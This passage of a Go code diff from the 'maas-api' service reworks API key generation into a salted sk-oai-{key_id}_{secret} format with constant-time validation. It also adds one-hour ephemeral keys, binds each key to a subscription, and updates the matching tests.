+		c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil)
+		c.Request.Header.Set("Content-Type", "application/json")
+		c.Request.Body = io.NopCloser(strings.NewReader(requestBody))
+		c.Set("user", testUser)
+
+		handler.CreateAPIKey(c)
+
+		assert.Equal(t, http.StatusBadRequest, w.Code)
+		var response map[string]string
+		err := json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err)
+		assert.Contains(t, response["error"], "cannot exceed 1 hour")
+	})
+}
+
+func TestSearchExcludesEphemeralByDefault(t *testing.T) {
+	gin.SetMode(gin.TestMode)
+	store := NewMockStore()
+	cfg := &config.Config{}
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
+	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
+
+	ctx := context.Background()
+	testUser := &token.UserContext{
+		Username: "test-user",
+		Groups:   []string{"system:authenticated"},
+	}
+
+	// Create regular keys
+	err := store.AddKey(ctx, testUser.Username, "regular-key-1", "hash-1", "Regular Key 1", "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
+	require.NoError(t, err)
+	err = store.AddKey(ctx, testUser.Username, "regular-key-2", "hash-2", "Regular Key 2", "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
+	require.NoError(t, err)
+
+	// Create ephemeral keys
+	err = store.AddKey(ctx, testUser.Username, "ephemeral-key-1", "hash-3", "Ephemeral Key 1", "", []string{"system:authenticated"}, testSubscriptionName, nil, true)
+	require.NoError(t, err)
+	err = store.AddKey(ctx, testUser.Username, "ephemeral-key-2", "hash-4", "Ephemeral Key 2", "", []string{"system:authenticated"}, testSubscriptionName, nil, true)
+	require.NoError(t, err)
+
+	t.Run("DefaultSearchExcludesEphemeral", func(t *testing.T) {
+		requestBody := `{}`
+		response := executeSearchRequest(t, handler, requestBody, testUser)
+
+		assert.Len(t, response.Data, 2, "should only return regular keys")
+		for _, key := range response.Data {
+			assert.False(t, key.Ephemeral, "should not include ephemeral keys")
+		}
+	})
+
+	t.Run("IncludeEphemeralFilter", func(t *testing.T) {
+		requestBody := `{"filters": {"includeEphemeral": true}}`
+		response := executeSearchRequest(t, handler, requestBody, testUser)
+
+		assert.Len(t, response.Data, 4, "should return all keys including ephemeral")
+
+		ephemeralCount := 0
+		for _, key := range response.Data {
+			if key.Ephemeral {
+				ephemeralCount++
+			}
+		}
+		assert.Equal(t, 2, ephemeralCount, "should have 2 ephemeral keys")
+	})
+}
diff --git a/maas-api/internal/api_keys/keygen.go b/maas-api/internal/api_keys/keygen.go
index bc8b73d63..442b2fd23 100644
--- a/maas-api/internal/api_keys/keygen.go
+++ b/maas-api/internal/api_keys/keygen.go
@@ -3,86 +3,173 @@ package api_keys
 import (
 	"crypto/rand"
 	"crypto/sha256"
+	"crypto/subtle"
 	"encoding/hex"
+	"errors"
 	"fmt"
 	"math/big"
 	"strings"
 )
 
 const (
-	// KeyPrefix is the prefix for all OpenShift AI API keys
+	// KeyPrefix is the prefix for all OpenShift AI API keys.
 	// Per Feature Refinement: "Simple Opaque Key Format" - keys must be short, opaque strings
 	// with a recognizable prefix matching industry standards (OpenAI, Stripe, GitHub).
 	KeyPrefix = "sk-oai-"
 
-	// entropyBytes is the number of random bytes to generate (256 bits).
+	// KeyIDSeparator separates the key_id from the secret in the API key.
+	KeyIDSeparator = "_"
+
+	// keyIDBytes is the number of random bytes for key_id (96 bits → ~16 base62 chars).
+	keyIDBytes = 12
+
+	// entropyBytes is the number of random bytes for the secret (256 bits).
 	entropyBytes = 32
 
-	// displayPrefixLength is the number of chars to show in the display prefix (after sk-oai-).
+	// displayPrefixLength is the number of chars to show in the display prefix.
 	displayPrefixLength = 12
 )
 
-// GenerateAPIKey creates a new API key with format: sk-oai-{base62_encoded_256bit_random}
+// GenerateAPIKey creates a new API key with format: sk-oai-{key_id}_{secret}
 // Returns: (plaintext_key, sha256_hash, display_prefix, error)
 //
 // Security properties (per Feature Refinement "Key Format & Security"):
-// - 256 bits of cryptographic entropy
+// - key_id: 96-bit random identifier (~16 base62 chars, guaranteed >= 12), used as unique salt
+// - secret: 256 bits of cryptographic entropy (~43 base62 chars)
+// - Hash: SHA-256(key_id + "\x00" + secret) - null delimiter prevents length-ambiguity attacks
 // - Base62 encoding (alphanumeric only, URL-safe)
-// - SHA-256 hash for storage (plaintext never stored)
-// - Display prefix for UI identification.
+// - Display prefix shows first 12 chars of key_id for UI identification.
+// - Use ParseAPIKey() to extract key_id and secret if needed.
 //
 //nolint:nonamedreturns // Named returns improve readability for multiple return values.
 func GenerateAPIKey() (plaintext, hash, prefix string, err error) {
-	// 1. Generate 32 bytes (256 bits) of cryptographic entropy
-	entropy := make([]byte, entropyBytes)
-	if _, err := rand.Read(entropy); err != nil {
-		return "", "", "", fmt.Errorf("failed to generate entropy: %w", err)
+	// 1. Generate key_id (96 bits → ~16 base62 chars)
+	keyIDEntropy := make([]byte, keyIDBytes)
+	if _, err := rand.Read(keyIDEntropy); err != nil {
+		return "", "", "", fmt.Errorf("failed to generate key_id entropy: %w", err)
 	}
+	keyID := encodeBase62(keyIDEntropy)
 
-	// 2. Encode to base62 (alphanumeric only, no special characters)
-	encoded := encodeBase62(entropy)
+	// 2. Generate secret (256 bits → ~43 base62 chars)
+	secretEntropy := make([]byte, entropyBytes)
+	if _, err := rand.Read(secretEntropy); err != nil {
+		return "", "", "", fmt.Errorf("failed to generate secret entropy: %w", err)
+	}
+	secret := encodeBase62(secretEntropy)
 
-	// 3. Construct key with OpenShift AI prefix
-	plaintext = KeyPrefix + encoded
+	// 3. Construct key: sk-oai-{key_id}_{secret}
+	plaintext = KeyPrefix + keyID + KeyIDSeparator + secret
 
-	// 4. Compute SHA-256 hash for storage
-	hash = HashAPIKey(plaintext)
+	// 4. Compute salted hash: SHA-256(key_id + secret)
+	// key_id serves as a unique per-key salt (FIPS 180-4 compliant)
+	hash = hashWithSalt(keyID, secret)
 
-	// 5. Create display prefix (first 12 chars + ellipsis)
-	if len(encoded) >= displayPrefixLength {
-		prefix = KeyPrefix + encoded[:displayPrefixLength] + "..."
+	// 5. Create display prefix (first 12 chars of key_id + ellipsis)
+	if len(keyID) >= displayPrefixLength {
+		prefix = KeyPrefix + keyID[:displayPrefixLength] + "..."
 	} else {
-		prefix = KeyPrefix + encoded + "..."
+		prefix = KeyPrefix + keyID + "..."
 	}
 
 	return plaintext, hash, prefix, nil
 }
 
-// HashAPIKey computes SHA-256 hash of an API key (for validation and storage)
-// This is the canonical hashing function - used by both key creation and validation.
-func HashAPIKey(key string) string {
-	h := sha256.Sum256([]byte(key))
+// hashWithSalt computes SHA-256(keyID + "\x00" + secret) for storage.
+// The keyID serves as a unique per-key salt, providing FIPS 180-4 compliant hashing.
+// The null byte delimiter prevents length-ambiguity attacks where different keyID/secret
+// splits could produce the same hash (e.g., "ab"+"c" vs "a"+"bc").
+func hashWithSalt(keyID, secret string) string {
+	h := sha256.Sum256([]byte(keyID + "\x00" + secret))
 	return hex.EncodeToString(h[:])
 }
 
-// IsValidKeyFormat checks if a key has the correct sk-oai-* prefix and valid base62 body.
+// ParseAPIKey extracts the key_id and secret from an API key.
+// Returns: (key_id, secret, error).
+// Key format: sk-oai-{key_id}_{secret}.
+func ParseAPIKey(key string) (string, string, error) {
+	if !strings.HasPrefix(key, KeyPrefix) {
+		return "", "", errors.New("invalid key prefix")
+	}
+
+	body := key[len(KeyPrefix):]
+	parts := strings.SplitN(body, KeyIDSeparator, 2)
+	if len(parts) != 2 {
+		return "", "", errors.New("invalid key format: missing separator")
+	}
+
+	keyID := parts[0]
+	secret := parts[1]
+
+	if keyID == "" || secret == "" {
+		return "", "", errors.New("invalid key format: empty key_id or secret")
+	}
+
+	return keyID, secret, nil
+}
+
+// ValidateAPIKeyHash validates an API key against a stored hash.
+// Computes SHA-256(key_id + secret) and compares with stored hash using constant-time comparison.
+func ValidateAPIKeyHash(key, storedHash string) bool {
+	keyID, secret, err := ParseAPIKey(key)
+	if err != nil {
+		return false
+	}
+
+	computedHash := hashWithSalt(keyID, secret)
+	return subtle.ConstantTimeCompare([]byte(computedHash), []byte(storedHash)) == 1
+}
+
+// HashAPIKey computes SHA-256 hash of an API key for validation.
+// Parses the key to extract key_id and secret, then computes SHA-256(key_id + secret).
+// Returns empty string if key format is invalid.
+func HashAPIKey(key string) string {
+	keyID, secret, err := ParseAPIKey(key)
+	if err != nil {
+		return ""
+	}
+	return hashWithSalt(keyID, secret)
+}
+
+// IsValidKeyFormat checks if a key has the correct format: sk-oai-{key_id}_{secret}
+// Both key_id and secret must be non-empty base62 strings.
 func IsValidKeyFormat(key string) bool {
 	if !strings.HasPrefix(key, KeyPrefix) {
 		return false
 	}
 
 	body := key[len(KeyPrefix):]
-	if len(body) == 0 {
-		return false // Reject empty body
+	parts := strings.SplitN(body, KeyIDSeparator, 2)
+	if len(parts) != 2 {
+		return false // Must have exactly one separator
+	}
+
+	keyID := parts[0]
+	secret := parts[1]
+
+	if keyID == "" || secret == "" {
+		return false // Both parts must be non-empty
+	}
+
+	// Validate key_id is base62
+	if !isBase62(keyID) {
+		return false
+	}
+
+	// Validate secret is base62
+	if !isBase62(secret) {
+		return false
 	}
 
-	// Validate base62 charset (0-9, A-Z, a-z)
-	for _, c := range body {
+	return true
+}
+
+// isBase62 checks if a string contains only base62 characters (0-9, A-Z, a-z).
+func isBase62(s string) bool {
+	for _, c := range s {
 		if (c < '0' || c > '9') && (c < 'A' || c > 'Z') && (c < 'a' || c > 'z') {
 			return false
 		}
 	}
-
 	return true
 }
 
diff --git a/maas-api/internal/api_keys/keygen_test.go b/maas-api/internal/api_keys/keygen_test.go
index bc653a6de..b60d6fd5e 100644
--- a/maas-api/internal/api_keys/keygen_test.go
+++ b/maas-api/internal/api_keys/keygen_test.go
@@ -2,6 +2,7 @@ package api_keys_test
 
 import (
 	"regexp"
+	"strings"
 	"testing"
 
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/api_keys"
@@ -14,44 +15,61 @@ func TestGenerateAPIKey(t *testing.T) {
 		t.Fatalf("GenerateAPIKey() returned error: %v", err)
 	}
 
-	// Test 1: Key has correct prefix
+	// Test 1: Key has correct format (sk-oai-{key_id}_{secret})
 	if !api_keys.IsValidKeyFormat(plaintext) {
-		t.Errorf("GenerateAPIKey() key missing prefix 'sk-oai-': got %q", plaintext)
+		t.Errorf("GenerateAPIKey() key has invalid format: got %q", plaintext)
 	}
 
-	// Test 2: Hash is 64 hex characters (SHA-256)
+	// Extract key_id using ParseAPIKey for further tests
+	keyID, _, parseErr := api_keys.ParseAPIKey(plaintext)
+	if parseErr != nil {
+		t.Fatalf("ParseAPIKey() failed on generated key: %v", parseErr)
+	}
+
+	// Test 2: Key contains the key_id
+	if !strings.Contains(plaintext, keyID) {
+		t.Errorf("GenerateAPIKey() key should contain key_id %q: got %q", keyID, plaintext)
+	}
+
+	// Test 3: Key has correct structure (prefix + key_id + separator + secret)
+	if !strings.HasPrefix(plaintext, api_keys.KeyPrefix+keyID+api_keys.KeyIDSeparator) {
+		t.Errorf("GenerateAPIKey() key should have format sk-oai-{key_id}_{secret}: got %q", plaintext)
+	}
+
+	// Test 4: Hash is 64 hex characters (SHA-256)
 	if len(hash) != 64 {
 		t.Errorf("GenerateAPIKey() hash length = %d, want 64", len(hash))
 	}
 
-	// Test 3: Hash is valid hex
+	// Test 5: Hash is valid hex
 	hexRegex := regexp.MustCompile("^[0-9a-f]{64}$")
 	if !hexRegex.MatchString(hash) {
 		t.Errorf("GenerateAPIKey() hash is not valid hex: %q", hash)
 	}
 
-	// Test 4: Prefix has correct format
+	// Test 6: Prefix has correct format (shows first 12 chars of key_id)
+	// Note: 96-bit key_id encodes to ~16 base62 chars (log62(2^96) ≈ 16.1), so key_id
+	// is always >= 12 chars, making the displayPrefixLength truncation always apply.
 	prefixRegex := regexp.MustCompile(`^sk-oai-[A-Za-z0-9]{12}\.\.\.$`)
 	if !prefixRegex.MatchString(prefix) {
 		t.Errorf("GenerateAPIKey() prefix format incorrect: got %q", prefix)
 	}
 
-	// Test 5: Key is alphanumeric after prefix (base62)
-	keyBody := plaintext[len(api_keys.KeyPrefix):]
+	// Test 7: key_id is base62 and expected length (~16 chars from 96 bits)
 	alphanumRegex := regexp.MustCompile("^[A-Za-z0-9]+$")
-	if !alphanumRegex.MatchString(keyBody) {
-		t.Errorf("GenerateAPIKey() key body not alphanumeric: got %q", keyBody)
+	if !alphanumRegex.MatchString(keyID) {
+		t.Errorf("GenerateAPIKey() key_id not alphanumeric: got %q", keyID)
 	}
-
-	// Test 6: Key body is sufficiently long (256 bits → ~43 base62 chars)
-	if len(keyBody) < 40 {
-		t.Errorf("GenerateAPIKey() key body too short: got %d chars, want >= 40", len(keyBody))
+	// 96 bits of entropy → log62(2^96) ≈ 16.1 chars, so key_id should be 15-17 chars
+	if len(keyID) < 12 {
+		t.Errorf("GenerateAPIKey() key_id too short: got %d chars, want >= 12", len(keyID))
 	}
 }
 
 func TestGenerateAPIKey_Uniqueness(t *testing.T) {
 	// Generate multiple keys and ensure they're unique
 	keys := make(map[string]bool)
+	keyIDs := make(map[string]bool)
 	hashes := make(map[string]bool)
 
 	for i := range 100 {
@@ -60,11 +78,21 @@ func TestGenerateAPIKey_Uniqueness(t *testing.T) {
 			t.Fatalf("GenerateAPIKey() iteration %d returned error: %v", i, err)
 		}
 
+		keyID, _, parseErr := api_keys.ParseAPIKey(plaintext)
+		if parseErr != nil {
+			t.Fatalf("ParseAPIKey() iteration %d returned error: %v", i, parseErr)
+		}
+
 		if keys[plaintext] {
 			t.Errorf("GenerateAPIKey() generated duplicate key on iteration %d", i)
 		}
 		keys[plaintext] = true
 
+		if keyIDs[keyID] {
+			t.Errorf("GenerateAPIKey() generated duplicate key_id on iteration %d", i)
+		}
+		keyIDs[keyID] = true
+
 		if hashes[hash] {
 			t.Errorf("GenerateAPIKey() generated duplicate hash on iteration %d", i)
 		}
@@ -73,8 +101,8 @@ func TestGenerateAPIKey_Uniqueness(t *testing.T) {
 }
 
 func TestHashAPIKey(t *testing.T) {
-	// Compute the hash for the test key
-	testKey := "sk-oai-test123"
+	// Use the new key format: sk-oai-{key_id}_{secret}
+	testKey := "sk-oai-testKeyID123_testSecretValue456"
 	hash := api_keys.HashAPIKey(testKey)
 
 	// Verify consistent hashing
@@ -89,24 +117,130 @@ func TestHashAPIKey(t *testing.T) {
 	}
 
 	// Verify different keys produce different hashes
-	differentHash := api_keys.HashAPIKey("sk-oai-different")
+	differentHash := api_keys.HashAPIKey("sk-oai-differentID_differentSecret")
 	if hash == differentHash {
 		t.Error("HashAPIKey() produced same hash for different keys")
 	}
+
+	// Verify invalid key format returns empty hash
+	invalidHash := api_keys.HashAPIKey("invalid-key-no-separator")
+	if invalidHash != "" {
+		t.Errorf("HashAPIKey() should return empty string for invalid format, got %q", invalidHash)
+	}
+}
+
+func TestParseAPIKey(t *testing.T) {
+	tests := []struct {
+		name        string
+		key         string
+		wantKeyID   string
+		wantSecret  string
+		wantErr     bool
+	}{
+		{
+			name:       "valid key",
+			key:        "sk-oai-myKeyID123_mySecretValue456",
+			wantKeyID:  "myKeyID123",
+			wantSecret: "mySecretValue456",
+			wantErr:    false,
+		},
+		{
+			name:    "missing prefix",
+			key:     "myKeyID123_mySecretValue456",
+			wantErr: true,
+		},
+		{
+			name:    "missing separator",
+			key:     "sk-oai-noSeparatorHere",
+			wantErr: true,
+		},
+		{
+			name:    "empty key_id",
+			key:     "sk-oai-_onlySecret",
+			wantErr: true,
+		},
+		{
+			name:    "empty secret",
+			key:     "sk-oai-onlyKeyID_",
+			wantErr: true,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			keyID, secret, err := api_keys.ParseAPIKey(tt.key)
+			if tt.wantErr {
+				if err == nil {
+					t.Errorf("ParseAPIKey() expected error, got keyID=%q secret=%q", keyID, secret)
+				}
+				return
+			}
+			if err != nil {
+				t.Errorf("ParseAPIKey() unexpected error: %v", err)
+				return
+			}
+			if keyID != tt.wantKeyID {
+				t.Errorf("ParseAPIKey() keyID = %q, want %q", keyID, tt.wantKeyID)
+			}
+			if secret != tt.wantSecret {
+				t.Errorf("ParseAPIKey() secret = %q, want %q", secret, tt.wantSecret)
+			}
+		})
+	}
+}
+
+func TestValidateAPIKeyHash(t *testing.T) {
+	// Generate a key and verify the hash validation works
+	plaintext, hash, _, err := api_keys.GenerateAPIKey()
+	if err != nil {
+		t.Fatalf("GenerateAPIKey() returned error: %v", err)
+	}
+
+	// Valid key should validate successfully
+	if !api_keys.ValidateAPIKeyHash(plaintext, hash) {
+		t.Error("ValidateAPIKeyHash() should return true for valid key")
+	}
+
+	// Wrong hash should fail
+	if api_keys.ValidateAPIKeyHash(plaintext, "wronghash") {
+		t.Error("ValidateAPIKeyHash() should return false for wrong hash")
+	}
+
+	// Wrong key should fail
+	if api_keys.ValidateAPIKeyHash("sk-oai-wrong_key", hash) {
+		t.Error("ValidateAPIKeyHash() should return false for wrong key")
+	}
+
+	// Invalid key format should fail
+	if api_keys.ValidateAPIKeyHash("invalid-key", hash) {
+		t.Error("ValidateAPIKeyHash() should return false for invalid key format")
+	}
 }
 
 func TestIsValidKeyFormat(t *testing.T) {
-	t.Run("ValidKey", func(t *testing.T) {
-		if !api_keys.IsValidKeyFormat("sk-oai-ABC123xyz") {
-			t.Error("Valid key should pass")
-		}
-	})
+	tests := []struct {
+		name  string
+		key   string
+		valid bool
+	}{
+		{"valid key with separator", "sk-oai-keyID123_secretValue456", true},
+		{"missing prefix", "keyID123_secretValue456", false},
+		{"missing separator", "sk-oai-noSeparatorHere", false},
+		{"empty key_id", "sk-oai-_onlySecret", false},
+		{"empty secret", "sk-oai-onlyKeyID_", false},
+		{"invalid chars in key_id", "sk-oai-key-ID_secret", false},
+		{"invalid chars in secret", "sk-oai-keyID_sec-ret", false},
+		{"completely invalid", "invalid-key", false},
+	}
 
-	t.Run("InvalidKey", func(t *testing.T) {
-		if api_keys.IsValidKeyFormat("invalid-key") {
-			t.Error("Invalid key should fail")
-		}
-	})
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got := api_keys.IsValidKeyFormat(tt.key)
+			if got != tt.valid {
+				t.Errorf("IsValidKeyFormat(%q) = %v, want %v", tt.key, got, tt.valid)
+			}
+		})
+	}
 }
 
 func BenchmarkGenerateAPIKey(b *testing.B) {
@@ -116,9 +250,20 @@ func BenchmarkGenerateAPIKey(b *testing.B) {
 }
 
 func BenchmarkHashAPIKey(b *testing.B) {
-	key := "sk-oai-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh"
+	key := "sk-oai-testKeyID123456_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh"
 
 	for b.Loop() {
 		_ = api_keys.HashAPIKey(key)
 	}
 }
+
+func BenchmarkValidateAPIKeyHash(b *testing.B) {
+	plaintext, hash, _, err := api_keys.GenerateAPIKey()
+	if err != nil {
+		b.Fatal(err)
+	}
+
+	for b.Loop() {
+		_ = api_keys.ValidateAPIKeyHash(plaintext, hash)
+	}
+}
diff --git a/maas-api/internal/api_keys/service.go b/maas-api/internal/api_keys/service.go
index 9d7e1c4fa..4628ad790 100644
--- a/maas-api/internal/api_keys/service.go
+++ b/maas-api/internal/api_keys/service.go
@@ -4,133 +4,176 @@ import (
 	"context"
 	"errors"
 	"fmt"
+	"strings"
 	"time"
 
 	"github.com/google/uuid"
 
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/config"
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/constant"
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger"
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription"
 )
 
+// SubscriptionSelector resolves which MaaSSubscription to bind when minting an API key.
+type SubscriptionSelector interface {
+	Select(groups []string, username string, requestedSubscription string, requestedModel string) (*subscription.SelectResponse, error)
+	SelectHighestPriority(groups []string, username string) (*subscription.SelectResponse, error)
+}
+
 type Service struct {
-	store  MetadataStore
-	logger *logger.Logger
-	config *config.Config
+	store       MetadataStore
+	logger      *logger.Logger
+	config      *config.Config
+	subSelector SubscriptionSelector
 }
 
-func NewService(store MetadataStore, cfg *config.Config) *Service {
-	return &Service{
-		store:  store,
-		logger: logger.Production(),
-		config: cfg,
-	}
+func NewService(store MetadataStore, cfg *config.Config, sub SubscriptionSelector) *Service {
+	return NewServiceWithLogger(store, cfg, sub, logger.Production())
 }
 
 // NewServiceWithLogger creates a new service with a custom logger (for testing).
-func NewServiceWithLogger(store MetadataStore, cfg *config.Config, log *logger.Logger) *Service {
+func NewServiceWithLogger(store MetadataStore, cfg *config.Config, sub SubscriptionSelector, log *logger.Logger) *Service {
 	if log == nil {
 		log = logger.Production()
 	}
 	return &Service{
-		store:  store,
-		logger: log,
-		config: cfg,
+		store:       store,
+		logger:      log,
+		config:      cfg,
+		subSelector: sub,
 	}
 }
 
 // CreateAPIKeyResponse is returned when creating an API key.
 // Per Feature Refinement "Keys Shown Only Once": plaintext key is ONLY returned at creation time.
 type CreateAPIKeyResponse struct {
-	Key       string  `json:"key"`       // Plaintext key - SHOWN ONCE, NEVER STORED
-	KeyPrefix string  `json:"keyPrefix"` // Display prefix for UI
-	ID        string  `json:"id"`
-	Name      string  `json:"name"`
-	CreatedAt string  `json:"createdAt"`
-	ExpiresAt *string `json:"expiresAt,omitempty"` // RFC3339 timestamp
+	Key          string  `json:"key"`       // Plaintext key - SHOWN ONCE, NEVER STORED
+	KeyPrefix    string  `json:"keyPrefix"` // Display prefix for UI
+	ID           string  `json:"id"`
+	Name         string  `json:"name"`
+	Subscription string  `json:"subscription"` // MaaSSubscription name bound to this key
+	CreatedAt    string  `json:"createdAt"`
+	ExpiresAt    *string `json:"expiresAt,omitempty"` // RFC3339 timestamp
+	Ephemeral    bool    `json:"ephemeral"`           // Short-lived programmatic key
 }
 
 // CreateAPIKey creates a new API key (sk-oai-* format).
-// Keys can be permanent (expiresIn=nil) or expiring (expiresIn set).
+// If expiresIn is not provided, defaults to APIKeyMaxExpirationDays (or 1hr for ephemeral).
 // Per Feature Refinement "Key Format & Security":
 // - Generates cryptographically secure key with sk-oai-* prefix
 // - Stores ONLY the SHA-256 hash (plaintext never stored)
 // - Returns plaintext ONCE at creation ("show-once" pattern)
 // - Stores user groups for subscription-based authorization.
 // Admins can create keys for other users by specifying a different username.
-func (s *Service) CreateAPIKey(ctx context.Context, username string, userGroups []string, name, description string, expiresIn *time.Duration) (*CreateAPIKeyResponse, error) {
-	// Validate expiration based on policy
-	if s.config != nil && s.config.APIKeyExpirationPolicy == "required" && expiresIn == nil {
-		return nil, errors.New("expiration is required by system policy")
-	}
-	if expiresIn != nil && *expiresIn <= 0 {
-		return nil, errors.New("expiration must be positive")
+func (s *Service) CreateAPIKey(
+	ctx context.Context, username string, userGroups []string, name, description string,
+	expiresIn *time.Duration, ephemeral bool, requestedSubscription string,
+) (*CreateAPIKeyResponse, error) {
+	// Compute max expiration days once from config-or-default (CWE-613 mitigation).
+	maxDays := constant.DefaultAPIKeyMaxExpirationDays
+	if s.config != nil && s.config.APIKeyMaxExpirationDays > 0 {
+		maxDays = s.config.APIKeyMaxExpirationDays
 	}
+	maxRegularDuration := time.Duration(maxDays) * 24 * time.Hour
 
-	// Validate against maximum expiration limit
-	if s.config != nil && expiresIn != nil {
-		maxDuration := time.Duration(s.config.APIKeyMaxExpirationDays) * 24 * time.Hour
-		if *expiresIn > maxDuration {
-			return nil, fmt.Errorf("requested expiration (%v) exceeds maximum allowed (%d days)",
-				*expiresIn, s.config.APIKeyMaxExpirationDays)
+	// Default expiration if not provided
+	if expiresIn == nil {
+		if ephemeral {
+			// Ephemeral keys default to 1 hour
+			d := 1 * time.Hour
+			expiresIn = &d
+		} else {
+			// Regular keys default to max expiration days
+			expiresIn = &maxRegularDuration
 		}
 	}
 
-	// Calculate absolute expiration timestamp
-	var expiresAt *time.Time
-	if expiresIn != nil {
-		expiry := time.Now().UTC().Add(*expiresIn)
-		expiresAt = &expiry
+	if *expiresIn <= 0 {
+		return nil, ErrExpirationNotPositive
 	}
 
-	// Generate the API key
+	// Validate against maximum expiration limit (always enforced)
+	if ephemeral {
+		// Ephemeral keys have a strict 1-hour maximum to prevent abuse
+		maxEphemeralDuration := 1 * time.Hour
+		if *expiresIn > maxEphemeralDuration {
+			return nil, fmt.Errorf("ephemeral key expiration (%v) cannot exceed 1 hour: %w", *expiresIn, ErrExpirationExceedsMax)
+		}
+	} else if *expiresIn > maxRegularDuration {
+		// Regular keys always enforce max expiration (config or default)
+		return nil, fmt.Errorf("requested expiration (%v) exceeds maximum allowed (%d days): %w",
+			*expiresIn, maxDays, ErrExpirationExceedsMax)
+	}
+
+	// Calculate absolute expiration timestamp (always set since we default to max)
+	expiresAt := time.Now().UTC().Add(*expiresIn)
+
+	// Generate the API key with embedded key_id (used as per-key salt).
+	// Format: sk-oai-{key_id}_{secret}
+	// Hash: SHA-256(key_id + "\x00" + secret) - null delimiter prevents length-ambiguity
+	// Note: key_id here is the embedded salt in the API key, distinct from keyID (DB UUID) below.
 	plaintext, hash, prefix, err := GenerateAPIKey()
 	if err != nil {
 		return nil, fmt.Errorf("failed to generate API key: %w", err)
 	}
 
+	var subResp *subscription.SelectResponse
+	var selectErr error
+	if requestedSubscription != "" {
+		//nolint:unqueryvet,nolintlint // Select is subscription resolution, not a SQL query
+		subResp, selectErr = s.subSelector.Select(userGroups, username, requestedSubscription, "")
+	} else {
+		subResp, selectErr = s.subSelector.SelectHighestPriority(userGroups, username)
+	}
+	if selectErr != nil {
+		s.logger.Warn("Subscription selection failed when creating API key",
+			"user", username,
+			"requestedSubscription", requestedSubscription,
+			"error", selectErr,
+		)
+		return nil, selectErr
+	}
+	subscriptionName := subResp.Name
+
 	// Generate unique ID for this key
 	keyID := uuid.New().String()
 
 	// Store in database (hash only, plaintext NEVER stored)
 	// Note: prefix is NOT stored (security - reduces brute-force attack surface)
 	// userGroups stored as PostgreSQL TEXT[] array (no JSON marshaling needed)
-	if err := s.store.AddKey(ctx, username, keyID, hash, name, description, userGroups, expiresAt); err != nil {
+	// Hash is SHA-256(key_id + secret) where key_id is embedded in the API key as per-key salt
+	if err := s.store.AddKey(ctx, username, keyID, hash, name, description, userGroups, subscriptionName, &expiresAt, ephemeral); err != nil {
 		return nil, fmt.Errorf("failed to store API key: %w", err)
 	}
 
-	s.logger.Info("Created API key", "user", username, "groups", userGroups, "id", keyID)
+	s.logger.Info("Created API key", "user", username, "groups", userGroups, "id", keyID, "ephemeral", ephemeral)
 
 	// Return plaintext to user - THIS IS THE ONLY TIME IT'S AVAILABLE
+	formatted := expiresAt.Format(time.RFC3339)
 	response := &CreateAPIKeyResponse{
-		Key:       plaintext, // SHOWN ONCE, NEVER AGAIN
-		KeyPrefix: prefix,
-		ID:        keyID,
-		Name:      name,
-		CreatedAt: time.Now().UTC().Format(time.RFC3339),
-	}
-	if expiresAt != nil {
-		formatted := expiresAt.Format(time.RFC3339)
-		response.ExpiresAt = &formatted
+		Key:          plaintext, // SHOWN ONCE, NEVER AGAIN
+		KeyPrefix:    prefix,
+		ID:           keyID,
+		Name:         name,
+		Subscription: subscriptionName,
+		CreatedAt:    time.Now().UTC().Format(time.RFC3339),
+		ExpiresAt:    &formatted,
+		Ephemeral:    ephemeral,
 	}
 
 	return response, nil
 }
 
-// List returns a paginated list of API keys for a user with optional filtering.
-// Pagination is mandatory - no unbounded queries allowed.
-// Admins can filter by username (empty = all users) and status.
-func (s *Service) List(ctx context.Context, username string, params PaginationParams, statuses []string) (*PaginatedResult, error) {
-	return s.store.List(ctx, username, params, statuses)
-}
-
 func (s *Service) GetAPIKey(ctx context.Context, id string) (*ApiKey, error) {
 	return s.store.Get(ctx, id)
 }
 
-// ValidateAPIKey validates an API key by hash lookup (called by Authorino HTTP callback)
+// ValidateAPIKey validates an API key (called by Authorino HTTP callback).
 // Per Feature Refinement "Gateway Integration (Inference Flow)":
-// - Computes SHA-256 hash of incoming key
-// - Looks up hash in database
+// - Parses the key to extract key_id and secret
+// - Computes SHA-256(key_id + secret) - key_id acts as per-key salt
+// - Looks up by hash (O(1) indexed lookup)
 // - Returns user identity if valid, rejection reason if invalid.
 func (s *Service) ValidateAPIKey(ctx context.Context, key string) (*ValidationResult, error) {
 	// Check key format
@@ -141,10 +184,17 @@ func (s *Service) ValidateAPIKey(ctx context.Context, key string) (*ValidationRe
 		}, nil
 	}
 
-	// Compute hash of incoming key
+	// Compute salted hash: SHA-256(key_id + secret)
+	// key_id is embedded in the API key and serves as per-key salt
 	hash := HashAPIKey(key)
+	if hash == "" {
+		return &ValidationResult{
+			Valid:  false,
+			Reason: "invalid key format",
+		}, nil
+	}
 
-	// Lookup in database
+	// Lookup by hash (O(1) indexed lookup)
 	metadata, err := s.store.GetByHash(ctx, hash)
 	if err != nil {
 		if errors.Is(err, ErrKeyNotFound) {
@@ -190,13 +240,25 @@ func (s *Service) ValidateAPIKey(ctx context.Context, key string) (*ValidationRe
 		groups = []string{} // Return empty array if no groups stored
 	}
 
+	// Fail closed: reject keys with no bound subscription (CWE-284)
+	// This prevents legacy keys, bad migrations, or manual writes with empty subscription
+	// from bypassing the "subscription bound at mint" access control invariant
+	if strings.TrimSpace(metadata.Subscription) == "" {
+		s.logger.Warn("API key missing bound subscription", "key_id", metadata.ID)
+		return &ValidationResult{
+			Valid:  false,
+			Reason: "key has no subscription bound",
+		}, nil
+	}
+
 	// Success - return user identity and groups for Authorino
 	return &ValidationResult{
-		Valid:    true,
-		UserID:   metadata.Username,
-		Username: metadata.Username,
-		KeyID:    metadata.ID,
